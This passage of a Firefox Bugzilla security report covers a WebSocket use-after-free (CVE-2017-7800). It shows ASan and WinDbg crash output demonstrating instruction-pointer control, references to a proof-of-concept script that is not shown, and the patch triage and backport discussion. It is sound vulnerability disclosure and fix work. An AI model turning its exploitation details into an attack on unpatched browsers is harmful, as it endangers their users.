#7 0x7f8914ae62b6 in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString const&, bool, mozilla::dom::WorkerType, nsAString const&, nsACString const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4660:8
#8 0x7f8914ae5914 in Constructor /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4577:10
#9 0x7f8914ae5914 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::WorkerOptions const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4518
#10 0x7f891294efbe in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WorkerBinding.cpp:973:68
#11 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
#12 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
#13 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
#14 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
#15 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
#16 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
#17 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
#18 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
#19 0x7f891acf1bca in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4635:12
#20 0x7f8911622269 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /home/thecoder/OpenSrc/firefox/dom/base/nsJSUtils.cpp:267:8
#21 0x7f8914fcaab5 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:2118:20
#22 0x7f8914fc669e in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:1722:10
#23 0x7f8914fabe76 in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:1424:10
#24 0x7f8914fa80fc in mozilla::dom::ScriptElement::MaybeProcessScript() /home/thecoder/OpenSrc/firefox/dom/script/ScriptElement.cpp:149:10
#25 0x7f89105481ed in AttemptToExecute /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsIScriptElement.h:225:18
#26 0x7f89105481ed in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:698
#27 0x7f8910541ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:499:7
#28 0x7f891057e2ab in nsHtml5ExecutorFlusher::Run() /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5StreamParser.cpp:129:9
#29 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
#30 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#31 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#32 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
#33 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#34 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#35 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#36 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
#37 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
#38 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#39 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#40 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#41 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
#42 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
#43 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
#44 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-use-after-free /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27 in assign_assuming_AddRef
Shadow bytes around the buggy address:
0x0c2680012020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2680012030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2680012040: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa
0x0c2680012050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2680012060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c2680012070: fd[fd]fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x0c2680012080: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c2680012090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c26800120a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c26800120b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c26800120c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2917==ABORTING
Reporter | ||
Comment 2•7 years ago
|
||
A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate the clear exploitability by controlling the EIP register.
Firefox Version: 56.0a1 (2017-06-17) (32-bit)
OS: Widows 10 home 64 bit
(740.23a8): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=1863b750 ecx=1863b750 edx=e5e5e5e5 esi=64136424 edi=1863b6a0
eip=41414141 esp=010fecdc ebp=010fece4 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
41414141 ?? ???
FAULTING_IP:
unknown!noop+0
41414141 ?? ???
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000008
Parameter[1]: 41414141
Attempt to execute non-executable address 41414141
0x41414141
xul!mozilla::RefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::ConstRemovingRefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::assign_assuming_AddRef+0x18
xul!nsCOMPtr<nsIWeakReference>::operator=+0x9
xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!nsThread::ProcessNextEvent+0x23a
xul!NS_ProcessNextEvent+0x14
xul!mozilla::ipc::MessagePump::Run+0x7a
xul!MessageLoop::RunInternal+0x8
xul!MessageLoop::RunHandler+0x20
xul!MessageLoop::Run+0x19
xul!nsBaseAppShell::Run+0x34
xul!nsAppShell::Run+0x26
Updated•7 years ago
|
Group: core-security → dom-core-security
Flags: sec-bounty?
Comment 3•7 years ago
|
||
baku: you were recently in this code in bug 1369913 so this is probably freshest on your mind. This doesn't look like the same issue (Disconnect vs Send).
Flags: needinfo?(amarchesini)
Keywords: sec-high → sec-critical
Assignee | ||
Updated•7 years ago
|
Assignee: nobody → amarchesini
Flags: needinfo?(amarchesini)
Assignee | ||
Comment 4•7 years ago
|
||
Attachment #8879832 -
Flags: review?(bugs)
Comment 5•7 years ago
|
||
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch
The callers of Disconnect() should keep the object alive, but I'm fine with this too since this is super simple to land to branches too.
Attachment #8879832 -
Flags: review?(bugs) → review+
Assignee | ||
Comment 6•7 years ago
|
||
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Yes. there is a test included.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Not particularly. I just keep WebSocketImpl alive before calling DisconnectInternal, instead after.
Which older supported branches are affected by this flaw?
all.
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
It's easy to backport.
How likely is this patch to cause regressions; how much testing does it need?
none.
Attachment #8879832 -
Flags: sec-approval?
Updated•7 years ago
|
status-firefox54:
--- → wontfix
status-firefox55:
--- → affected
status-firefox56:
--- → affected
status-firefox-esr52:
--- → affected
tracking-firefox55:
--- → +
tracking-firefox56:
--- → +
tracking-firefox-esr52:
--- → 55+
Comment 7•7 years ago
|
||
(In reply to Andrea Marchesini [:baku] from comment #6)
> Comment on attachment 8879832 [details] [diff] [review]
> websocket.patch
>
> [Security approval request comment]
> How easily could an exploit be constructed based on the patch?
>
> Yes. there is a test included.
This can't be checked in "as is" then.
Security bugs that need sec-approval can't have a test checked in with them as the test will 0day our users.
We need the test and the fix separated into different patches and I can then sec-approval+ the fix and the test patch can land *after* we *ship* the fix in a final public release (such as Firefox 55).
The question above is more about "is this fix so obvious that checking in the fix points a giant sign as an exploitable security problem." I'll still need to understand the risk there when the patch is broken up.
Flags: needinfo?(amarchesini)
Comment 8•7 years ago
|
||
I see, now that I look at the patch, that there is no test so I guess this is a miscommunication.
I do see a Kungfu Deathgrip and, as Dan pointed out to me, the comment is kind of a give away, "DisconnectInternal() can release the object".
I'll give sec-approval+ but not for checkin until July 10, in the middle of the current development cycle.
Whiteboard: [checkin on 7/10]
Comment 9•7 years ago
|
||
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch
Once this goes in, we'll want Beta and ESR52 patches nominated as well.
Attachment #8879832 -
Flags: sec-approval? → sec-approval+
Assignee | ||
Comment 10•7 years ago
|
||
> > Yes. there is a test included.
>
> This can't be checked in "as is" then.
What I meant is that there is a script able to trigger the crash. This script is not included in the patch but it's available from the description of the bug.
Flags: needinfo?(amarchesini)
Comment 11•7 years ago
|
||
Yes, I see that. The sec-approval questions are about the checkin and patch since the bug won't be opened until after we ship. You have sec-approval+ to check in on July 10 or after.
Comment 12•7 years ago
|
||
https://hg.mozilla.org/integration/mozilla-inbound/rev/bc535203a6eff61f308eb8ddf13afe8268cccb9f
Note that the attached patch needed rebasing on trunk due to bug 1372453. The patch as-attached applies cleanly to Beta but will require a bit of trivial rebasing for ESR52. Please request Beta and ESR52 approval on the patch when you get a chance.
Flags: needinfo?(amarchesini)
Whiteboard: [checkin on 7/10]
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla56
Assignee | ||
Comment 14•7 years ago
|
||
Patch rebased
Attachment #8879832 -
Attachment is obsolete: true
Flags: needinfo?(amarchesini)
Assignee | ||
Comment 15•7 years ago
|
||
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch
Approval Request Comment
[Feature/Bug causing the regression]: WebSocket implementation
[User impact if declined]: The WebSocket object can be released before completing the Disconnect() operation. This is a UAF.
[Is this code covered by automated tests?]: no tests. race condition.
[Has the fix been verified in Nightly?]: none
[Needs manual test from QE? If yes, steps to reproduce]: none
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: no.
[Why is the change risky/not risky?]: The ::Disconnect() method already uses a kungfuDeathGrip but this must be created at the beginning.
[String changes made/needed]: none
Attachment #8885156 -
Flags: approval-mozilla-esr52?
Attachment #8885156 -
Flags: approval-mozilla-beta?
Updated•7 years ago
|
Group: dom-core-security → core-security-release
Comment 16•7 years ago
|
||
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch
sec-critical, beta55+, esr52.3+
Attachment #8885156 -
Flags: approval-mozilla-esr52?
Attachment #8885156 -
Flags: approval-mozilla-esr52+
Attachment #8885156 -
Flags: approval-mozilla-beta?
Attachment #8885156 -
Flags: approval-mozilla-beta+
Comment 17•7 years ago
|
||
uplift |
Comment 18•7 years ago
|
||
uplift |
Comment 19•7 years ago
|
||
(In reply to Andrea Marchesini [:baku] from comment #15)
> [Is this code covered by automated tests?]: no tests. race condition.
> [Has the fix been verified in Nightly?]: none
> [Needs manual test from QE? If yes, steps to reproduce]: none
Setting qe-verify- based on Andrea's assessment on manual testing needs.
Flags: qe-verify-
Updated•7 years ago
|
Flags: sec-bounty? → sec-bounty+
Updated•7 years ago
|
Alias: CVE-2017-7800
Whiteboard: [adv-main55+][adv-esr52.3+]
Comment 20•7 years ago
|
||
(In reply to Looben Yang from comment #2)
> A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> the clear exploitability by controlling the EIP register.
>
> Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> OS: Widows 10 home 64 bit
I was not able to reproduce any kind of crash, let alone one showing EIP control, with these same conditions (except I'm using Win 10 Pro instead of Home). I also tried 64-bit Firefox builds to no avail.
With the original testcase I had been able to reproduce a UAF-looking crash both 32-bit and 64-bit Firefox 54.0.1 builds.
Reporter | ||
Comment 21•7 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #20)
> (In reply to Looben Yang from comment #2)
> > A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> > the clear exploitability by controlling the EIP register.
> >
> > Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> > OS: Widows 10 home 64 bit
>
> I was not able to reproduce any kind of crash, let alone one showing EIP
> control, with these same conditions (except I'm using Win 10 Pro instead of
> Home). I also tried 64-bit Firefox builds to no avail.
>
> With the original testcase I had been able to reproduce a UAF-looking crash
> both 32-bit and 64-bit Firefox 54.0.1 builds.
Reporter | ||
Comment 22•7 years ago
|
||
If it's not reproduced, then probably the timeout delay needs some adjustment.
I just simplified the PoC a little bit and attached it as UAF_DisconnectInternal_POC_EIP_41414141_2.js.
It seems a lot easier to reproduced in another machine. Daniel, can you give it a try with this one?
Firefox Version: 54.0.1 (32-bit)
OS: Widows 10 Pro 64 bit
(6060.2b6c): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=195676a8 ecx=195676a8 edx=e5e5e5e5 esi=11c6d760 edi=19567600
eip=41414141 esp=00eff29c ebp=00eff2a4 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
41414141 0000 add byte ptr [eax],al ds:002b:a1a1a1a1=41
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll -
GetUrlPageData2 (WinHttp) failed: 12002.
FAULTING_IP:
unknown!noop+0
41414141 0000 add byte ptr [eax],al
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000008
Parameter[1]: 41414141
Attempt to execute non-executable address 41414141
FAULTING_THREAD: 00002b6c
PROCESS_NAME: firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000008
EXCEPTION_PARAMETER2: 41414141
WRITE_ADDRESS: 41414141
FOLLOWUP_IP:
unknown!noop+0
41414141 0000 add byte ptr [eax],al
FAILED_INSTRUCTION_ADDRESS:
unknown!noop+0
41414141 0000 add byte ptr [eax],al
NTGLOBALFLAG: 400
APPLICATION_VERIFIER_FLAGS: 0
APP: firefox.exe
ANALYSIS_VERSION: 10.0.10240.9 x86fre
IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
BUGCHECK_STR: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1
DEFAULT_BUCKET_ID: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1
LAST_CONTROL_TRANSFER: from 0ff025b0 to 41414141
STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
00eff298 0ff025b0 e5e5e5e5 00eff2d4 10bb616e 0x41414141
00eff2a4 10bb616e 00000000 00000000 1e2b7a30 xul!RefPtr<mozilla::dom::StyleSheetList>::assign_assuming_AddRef+0x18
00eff2d4 10bb9dda 101dd28e 1ea744c0 1ea744f4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
00eff2d8 101dd28e 1ea744c0 1ea744f4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
00eff2ec 100852eb 1e2b7a30 196e89c0 196e89f4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
00eff314 1008526f 00eff344 100852eb 1f466970 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff31c 100852eb 1f466970 0b7f5864 1e382670 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff344 1008526f 00eff3c4 1001be8f 1e382670 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff34c 1001be8f 1e382670 02e27170 02e27160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff3c4 1001d5ba 02e04200 00000000 00eff3f7 xul!nsThread::ProcessNextEvent+0x244
00eff3f8 101cb809 02e25060 293a22ed 0b7f5860 xul!mozilla::ipc::MessagePump::Run+0x72
00eff430 101cb7d8 02e04200 00000001 0b7f5800 xul!MessageLoop::RunHandler+0x20
00eff450 100ef8ce 0b7f7640 00000000 00eff470 xul!MessageLoop::Run+0x19
00eff460 100ef65d 0b7f5860 0b7f7640 00eff484 xul!nsBaseAppShell::Run+0x34
00eff470 100ef612 0b7f5860 00eff7d5 0d5ce080 xul!nsAppShell::Run+0x26
00eff484 100eeee6 0b7f7640 00eff6f0 00eff6d8 xul!nsAppStartup::Run+0x22
00eff678 1011dfc1 02e03050 00eff824 00000001 xul!XREMain::XRE_mainRun+0xa92
00eff6b4 1011d93d 02e101c0 02e10220 00eff824 xul!XREMain::XRE_main+0x366
00eff7e4 1011d8ff 00eff824 00effb68 00341bdd xul!XRE_main+0x39
00eff7f0 00341bdd 00000001 02e03050 00eff824 xul!mozilla::BootstrapImpl::XRE_main+0x11
00effb68 00345b3f 00000001 fe1a4498 00fa7560 firefox!wmain+0x65d
00effbb0 77958744 00c1e000 77958720 4de8583d firefox!__scrt_common_main_seh+0xf9
00effbc4 77e6587d 00c1e000 4d87acba 00000000 KERNEL32!BaseThreadInitThunk+0x24
00effc0c 77e6584d ffffffff 77e8632e 00000000 ntdll!__RtlUserThreadStart+0x2f
00effc1c 00000000 00345bb5 00c1e000 00000000 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: unknown!noop+0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: unknown
IMAGE_NAME: unknown.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 0
STACK_COMMAND: ~0s ; kb
BUCKET_ID: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_BAD_IP_unknown!noop+0
PRIMARY_PROBLEM_CLASS: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_BAD_IP_unknown!noop+0
FAILURE_PROBLEM_CLASS: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: unknown.dll
FAILURE_FUNCTION_NAME: noop
FAILURE_SYMBOL_NAME: unknown.dll!noop
FAILURE_BUCKET_ID: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_c0000005_unknown.dll!noop
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:software_nx_fault_invalid_fill_pattern_a1a1a1a1_c0000005_unknown.dll!noop
FAILURE_ID_HASH: {0b68b053-9232-2309-5b3f-b2f98916a7a4}
Followup: MachineOwner
---------
Updated•7 years ago
|
Flags: needinfo?(dveditz)
Comment 23•7 years ago
|
||
That worked a lot better, especially when I switched to tinderbox builds instead of nightlies so they didn't keep auto-updating. Very reliably crashed executing 0x41414141 in a 32-bit build
bp-302daa81-58d5-411f-b463-89e940170721
bp-2882dd22-a602-4c21-ae88-6fe020170721
(I have no idea why it thinks the install time was two days ago. I just unzipped it shortly before running the testcase and submitting the crash, and the zip itself was packed on the build date last month).
Flags: needinfo?(dveditz)
Updated•7 years ago
|
Group: core-security-release
Updated•6 years ago
|
Component: DOM → DOM: Core & HTML
Updated•6 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•